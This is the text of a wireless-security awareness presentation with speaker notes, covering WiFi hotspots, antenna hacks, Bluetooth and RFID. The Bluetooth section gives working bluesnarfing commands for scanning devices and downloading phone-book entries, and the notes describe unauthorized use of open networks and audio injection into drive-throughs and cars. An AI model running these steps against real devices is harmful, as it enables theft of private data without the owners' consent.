Wireless Network Security?
Author: Paul Asadoorian, GCIA, GCIH
Contributions by Larry Pesce, GCFA, GAWN
PaulDotCom

1
Many are aware that wireless networks, given their open nature, are not secure. Some may take precautions, such as running WEP, using a VPN,
and using the newer WPA standards. This presentation aims to raise awareness about attacks that are not easily detectible or preventible on most
wireless networks today.
This is not a “0day” presentation, there are no “new” attacks, merely demonstrations of existing attacks in different scenarios. In fact, the attacks
presented in this paper are from research that was done as long as a year ago, with the newest “attack” being presented in early 2006.
It is not the goal of this presentation to tell you not to use wireless networks, but make you aware of the risk so you can make informed decisions
about your usage of wireless technology and do everything possible to protect your organization’s network infrastructure, data, and integrity of its
client computers.
Topics
•
Why wireless security is increasingly important
•
Wireless security misconceptions
•
Wireless Attacks
-
Detection & Prevention
•
Defensive Wireless Computing
2
The roadmap for this presentation will first stress the importance of wireless security today. Wireless technology is increasingly everywhere and in
everything. We will then attempt to debunk some of the common wireless security misconceptions. To further stress the vulnerabilities in wireless
networks three attacks will be discussed, demonstrated, and ideas for detection and prevention presented. Finally we will turn our attention to
practical ways in which to *try* to secure your wireless computing environment.
Warning:Wireless Network

May Become Unstable
3
Just a warning (We have permission to perform attacks against the wireless network and clients and will do so in a
responsible manner)
Wifi Everywhere
•
Wifi in the home can be done
for $39
•
Almost all laptops come with
Wifi
•
New standards such as MIMO
(802.11n) will allow for 108Mb
4
Linksys has popularized the wireless networking at home experience by marketing cheap and easy to setup wireless hardware. In today’s market
most laptop computers come with a wireless card built-in, including Apple and Wintel. This makes it easy to setup wireless in the home, all you
need is a $39 device, and whamo, you are now a Wifi household.
One of the drawbacks to wireless networks is speed, it is not as fast as plugging into the wire. However, new standards are looking to solve this
problem by offering speeds comparible to the wired ethernet. What does this mean? In the home, there will be little incentive to run expensive
cables, which means more people will migrate to wireless.
The Linksys WRT54G is the swiss army knife of Wifi, you can add battery packs and all sorts of other fun stuff (some of which you will see in this
presentation). A battery pack lets you take your AP where ever you want to go.
Take Your AP With You!
5
We’ve estimated that you can get 3.5 hours with 8 AA batteries.
Resources:
- “Linksys WRT54G Battery Power Guide”
Wireless is in everything
•

More devices are using Wifi:
-
Cell phones
-
Digital cameras
-
Printers
-
PDAs
-
Video game controllers
-
Televisions
-
Speakers
-
Refrigerators
6
Wifi technology can be found in many popular consumer electronics devices that are permiating the market. You digital camera has Wifi so it can
talk to your Wifi enabled printer (because I guess plugging in a cable it too much work for the average consumer). Nintendo has released Wii (W-
ee), which uses Wifi controllers - Don’t forget the XBOX 360 wireless controllers!
Depicted here are wireless extensions for you TV (to get a wireless HD signal or display pictures on your TV) and your refrigerator, you know, so
you don’t miss your favorite show while cooking or grabbing a snack.
Wireless In Cell Phones
•
Useful to drain battery
•
Imagine 802.11n on a cell phone!
•
Kind of a cool thing in a pinch

-
Best Buy
-
Emergency War Driving
7
Cell phones are now featuring wireless technology, allowing you to browse the web and check email wherever you can find a hotspot (we’ll discuss
hotspots a little later on). This technology is useful to drain your battery, and 802.11n isn’t going to help things (in fact, I envision flames shooting
out of the early models). It does come in handy:
- While standing in Best Buy one day I notices that they had a bench of computers setup, most looked like customer computers being worked on by
the crack team called “Geek Squad”. I also noticed that they were plugged into WRT54G devices, which also means I smelled an open Wifi
network. So while waiting, impatiently, I decided to conduct an experiment. I fired up the Wifi on my phone and saw the wireless network “best
buy” and “geek squad”. I connected to the “geek squad” open SSID, and bam I had an RFC1918 address. I didn’t go any further, but you can use
your imagination from here.
- Sometimes I get really bored on my drive home from work and I feel the need to do a war drive. I don’t always have all my war-driving gear on
board, so for a quick fix I enable Wifi on my cell. I am still entertained by some of the SSIDs that I find, such as one near my house labeled
“redneckheaven”. (Insert dueling banjos music here).
Takes Cool Pictures Too
8
This page left intentionally “W00T”!
Wifi Everywhere: FON
•
“Global hotspots” allow members to access open
wireless networks
•
Most do not provide encryption
•
Three different access models:
-
linus
-

gates
-
alien
•
Read more at
9
FON is an interesting social networking concept (and I mean that in the techie networking way, and the social networking way). You can buy a
wireless access point from FON for as little as $20. The catch is that once you set it up, you have to share it.
The concern with FON, and other setups, is that they typically do little to secure the wireless network. This leaves you, and anyone connecting to
you, vulnerable to attack.
FON also uses a modified Linksys WRT54G wireless router.
Wifi Everywhere: Open
Hotspot
•
WRT54G-based Wifi Hotspot distros:
-
EWRT -
-
Chillispot - - Runs on OpenWRT
-
WifiDog - - Also runs on OpenWRT
10
There are many other open source projects which implement the “captive portal” technology to create an open wireless network. The above three
also run on a WRT54G wireless router, with EWRT even having its own firmware that you install directly on the router. Chillispot and Wifidog run
on OpenWRT (), which is a very popular, open-source, operating system designed specifically for the WRT54G platform.
The basic premise is that you run an open wireless network. Once a client connects to the network they get an IP address from DHCP. When the
user opens a web browser they are automatically taken to a login page no matter which web site they enter in the URL bar of the web browser.
This can be accomplished in a few different ways, such as DNS cache poisoning and destination NAT’ing.
Add Gigantic Antennas!
Wireless for the whole neighborhood

11
There are many different antenna hacks for the WRT54G, for more information on building antennas see:
- Many sample chapters from the “Wifi Toys” book on this site. Includes excellent information on
how to build your own cables and antennas.
It threatens your ISPs
business model
•
Sharing your Internet connection cuts into ISP
profits (They hate it when that happens)
•
Cox, local ISP, recently notified all customers
about the dangers of open WiFi:
“Our installers enable these built-in security
features (like SSID and WEP encryption)”
-
Read more at />12
We’ve all done it at one point or another, connected to someone else’s wireless network to use the Intenret (somes not even on purpose!). So why
purchase your own Internet connection when you can just use someone elses? ISPs obviously have a huge problem with this, and some, as seen
above, put forth marketing campaigns that are aimed at people’s security fears. In reality, they are trying to save their business.
If they truly cared about security they would not offer “SSID” and “WEP” as potential security measures.
•
Build your own antenna to increase wireless range
•
Requires tools, mechanical skills
•
Chili & Pringles cans are most popular
-
Who wants to eat an entire can of Chili anyway?

Nobody is safe in my

neighborhood
13
Antennas are fun, cheap, and easy to make. They can really boost signal so you can pickup your neighbors Wifi from afar.
For the Anti-do-it-
yourselfer
CompUSA brand 9Dbi Antenna for
Linksys WRT54G - $50
12Dbi “Wireless Garden Super
Cantenna Wireless Network Booster
Antenna” - $50
9 Dbi Directional Indoor Antenna - $30
14
You can buy RF antennas very cheap now. It was almost a year ago that I started seeing high gain antennas for sale at CompUSA, now the
selection is quite vast. Just go to www.compusa.com and search for “antenna”.
A 12Dbi antenna from CompUSA is now just $50.
From www.netgate.com, you can get a nice indoor/outdoor Yagi antenna for $30.
More Wireless Technologies
•
Thats just why WiFi needs to be secure
•
Wireless encompasses:
-
Bluetooth
-
RFID
-
Radio Waves
15
Radio waves: 900MHz Cordless telephones, Pagers, baby monitors video survailance and security
Taco Bell Takeover

“Taco Bell Takeover After weeks of messing with the frequencies of a nearby Taco
Bell, we decide to film ourselves messing with ourselves. Just so we could witness
the employees reactions to the prank. RBCP and a neighbor of his drove to Taco
Bell to place an order while RijilV and Is0tek stayed behind to mess with their order.”
/>16
As wireless becomes more popular, so do opportunities for hacking. In the above example a team of hackers hijack a Taco Bell drive-through and
inject audio into the drive-through radio system. There are many funny moments, such as when the manager comes out and scours the parking lot
looking for the offenders stating, “They have to be within 50 feet!”.

17
•
Bluetooth suffers from
many insecurities as well
•
Widely available on cell
phones, mice, and
keyboards
•
Class 1 can travel up to
100 meters (unamplified)
Bluetooth - The New/Old
Frontier
17
Bluetooth hacking is becoming more popular, and so are bluetooth devices. Many talks at hacker conferences focus on attacking and exploiting
bluetooth. Above is a bluetooth rifle, first showcased at Defcon in 2004. In recent tests, they have detected over 20 bluetooth devices from more
than half a mile away!

* Bluetooth wireless IDS was invented after developers grabbed a list of a CEOs contacts using bluetooth hacking tools.
For the not-so-
mechanically inclined

•
Bluetooth can go far despite popular
belief
•
They even make a Bluetooth dongle
with an external antenna! ($40)
•
Or go extreme!
-

18
Bluetooth devices use the same spectrum (2.4GHz) as Wifi, and therefore all of the antennas, and antenna building techniques, and similar. The
cost of these devices is steadily dropping. CompUSA (in all its glory) offers a $40 USB dongle with a built-in antenna.
For more extreme bluetooth goodness, you can go to www.wardrivingworld.com and pick up +12dBi antenna kits for around $140.
Bluecasing/Bluesnarfing
•
Bluetooth relies on a pin to provide security
-
Typically the default is “0000”
-
I think that was the combination to my luggage (I
changed it from 1234)
•
There are numerous tools and attacks that allow you to:
-
Download address book
-
Change address book
-
Delete address book

-
Make phone calls
-
Listen to phone calls
19
Somehow, somewhere along the line, it was thought that a “pass key” of “0000” was some kind of security measure. Granted, it would be difficult
to enter even an 8 character, upper/lower case, mixed with letters and numbers password into a bluetooth headset.
Bluesnarfing can be a dangerous attack. A particular person’s cell phone call history or address book could be useful information, especially if it is
the CEO’s cell phone.
Its Easy!
•
All you need is
-
Laptop with CD-ROM
-
A USB Bluetooth dongle
-
Auditor boot CD
•
Then go download the following tutorial:
-
/>20
Attacking bluetooth devices is quite easy. The above video tutorial is very good, and shows you all the commands you will need:
hciconfig hci0 - Similar to “ifconfig” but for bluetooth devices.
rfcomm bind /dev/rfcomm0 00:0F:DE:CF:4D:D7 1 - Binds rfcomm manually to your bluetooth adapter on channel 1.
rfcomm connect /dev/rfcomm0 00:0F:DE:CF:4D:D7 10 - Connect to a bluetooth device connected to your computer.
hcitool scan hci0 - Lists the available bluetooth devices in range, including the MAC address.
bluesnarfer -i -b <MAC> - This lists information about available bluetooth devices
bluesnarfer -r1-100 -b <MAC> - Downloads the first 100 phone book entries.
The hciconfig tool is useful to see the state of your bluetooth devices. hciconfig hci0 reset is useful too, as sometimes bluesnarfer or btscanner

will leave your bluetooth device in a “funky” state (no, not Rhode Island either).
To make bluesnarfer work with the default code:
1. no entries in /etc/bluetooth/rfcomm.conf - bluesnarfer will do everything you need.
2. mkdir -p /dev/bluetooth/rfcomm
3. mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
4. run bluesnarfer
5. profit?
Fun With Bluesnarfing
21
Above you can se some of the bluesnarfing tools in action.
More fun bluetooth tools
•
btscanner - “Kismet-like” interface for scanning the
air for bluetooth devices
-
Denotes which phones are vulnerable and what they are
vulnerable to
•
Car Whisperer - Allows you to inject and/or record
audio on certain bluetooth devices
-
Headsets
-
Bluetooth enabled cars
22
btscanner is a great tool that will look for all bluetooth devices in range. You can often see all sorts of information about that
device, such as make/model, the “name” string (which sometimes leaks even more information about the device, such as
“Jeff’s Phone”, and whether or not it is vulnerable to bluetooth attacks. In that respect, its almost like a bluetooth vulnerability
scanner.
Car Whisperer is an attack suite which allows you to scan for vulnerable bluetooth devices and inject audio. Some cars have

integrated bluetooth, which could allow an attack to inject audio into the car! This also works with some model bluetooth
headsets. See the following links for more information:
http://trifinite.org/trifinite_stuff_carwhisperer.html

Bluetooth Demo
23
“All you bluetooth are belong to us”
Well, not really, but it sounds cool :)
•
Redfang - Allows you to brute force the MAC
address to find non-discoverable devices
•
T-BEAR - The Transient Bluetooth Environment
AuditoR allows for the same
•
WRTSL54GS - Linksys WRT54G with a USB port
-
- Support for
Bluetooth
-
Fun possibilities
More fun bluetooth tools
24
Redfang is an interesting tool. It tries to solve the MAC address problem by brute forcing the 48-bit mac address. Not the most efficient solution,
but if you are more patient this is an option. This tool will find devices that are not in discoverable mode.
T-BEAR is another bluetooth hacking suite, simliar to bluesnarfer and redfang.
The WRTSL54GS presents a potential platform for bluetooth hacking because it provides a USB port. THe bluez bluetooth linux drivers have been
ported to OpenWRT, so look for good things to come.
RFID
•

Radio Frequency IDentification
•
Anyone who has ever bought
clothing experienced RFID
•
Most operating in the 13.56MHz
spectrum
-
Long range RFID devices can operate in the
2.4/5GHz spectrum
•
Used in everything from people to
packages
25
RFID is gaining popularity both in practical usage and in the hacking community. Pay tolls, gas stations, department stores, warehouses,
passports, and even humans are using RFID as a method of identification.
Below are some RFID resources:
/> /> />RFID also brings about privacy concerns, see the EFF page below for more information:
/>